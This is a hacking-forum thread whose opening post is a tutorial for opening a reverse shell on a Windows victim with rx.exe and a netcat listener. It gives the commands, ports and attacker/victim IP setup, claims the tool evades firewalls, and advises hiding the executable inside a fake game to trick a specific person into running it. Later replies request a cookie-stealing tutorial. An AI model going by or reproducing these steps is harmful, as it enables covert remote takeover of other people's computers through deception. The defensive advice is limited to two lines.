Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


exploiting pc data filter_list
Author
Message
exploiting pc data #1
Now as some of you may have used metasploit in the past, in the payloads or exploit list ( i don't really remember ) there might a have been a windows/meterpreter/reverse shell payload ... in this tut i will cover how to exploit a pc through a reverse shell without metasploit ...

RX.EXE is the "smallest" vc++ coded universal application.
Why i said UNIVERSAL is because it runs on every kind of windows
from win 93 to xp, any kind of service pack ...

 Default port from which it connects: 443
 Default port to which it connects: 8080


NOTE : i really recommand you to try this hack in a vmware workstation with win xp or win 2000 installed on it .


Lets say we have 2 computers

the victim with the ip of 10.10.10.18
and the hacker with the ip of 10.10.10.36

( do not close any command promts or winsows during this tutorial , keep all cmd's you open, opened )
now on the hacker machine open netcat and execute
nc –l –n –v –p 8080
netcat will start listening your prompts

on the victim's machine ( where you will have already put rx.exe on a directory ) start rx's promt and type
rx 10.10.10.36 ( NOTE THIS IS THE HACKER'S IP ? ) and press enter

for one moment its stuck but lets go back to the hackers machine
open the netcat session that you started to listen on the hacker machine and you will see a
C:/>
could that be the victim's prompt ?
yea it is Big Grin
and you can verify it by typing ipconfig and you will see the victims IP, you succesfully reversed a shell between 2 computers and now you can play with it around a bit

Now as most of you read this they could think :
"nah metasploit already puts a reverse shell connection to me and a victim, and its eisier"
well let me tell you something, metasploit can be blocked by different kind of firewalls but rx cant Big Grin

" how do i put the rx.exe in the victim ? if i have to excecute if from his pc i need the hack to exploit data so this is ussless" :
well lets say u wanna hack a guy whic's pc is restricted to ppl, also with a strong pass but he loves to play games
you can put the rx.exe in a game that you will say you made and when he executes it the rx process will run but just remember to do it the right way ...


ways to protect ? :

-strong and updated anti-viruses
-ACL's

Reply

RE: exploiting pc data #2
Information content is Good, Used on XP.
Does not work in x64 Platforms of Windows anymore.
EDIT ; Tried, Did not work on my Win7 x64.
[Image: 9Kcm1.png]
To the Mind that is still, The Whole World Surrenders.
Exploiter on Team OpenFire
C,C++,Java and Perl source Developer.

Reply

RE: exploiting pc data #3
ok maybe this isnt workin on newer os

Reply

RE: exploiting pc data #4
(05-26-2011, 06:11 PM)HeR97 Wrote: ok maybe this isnt workin on newer os

gr8......hey ua comleted your 100 post..congratsBiggrinBiggrinBiggrinBiggrinBiggrin

Reply

RE: exploiting pc data #5
xDDD now tihs is 101st Biggrin

Reply

RE: exploiting pc data #6
(05-26-2011, 06:17 PM)HeR97 Wrote: xDDD now tihs is 101st Biggrin
keep it up..gud work..hey cn yew give me tha..tut ov cookies stealing....Biggrin

(05-26-2011, 06:17 PM)HeR97 Wrote: xDDD now tihs is 101st Biggrin
keep it up..gud work..hey cn yew give me tha..tut ov cookies stealing....Biggrin

Reply







Users browsing this thread: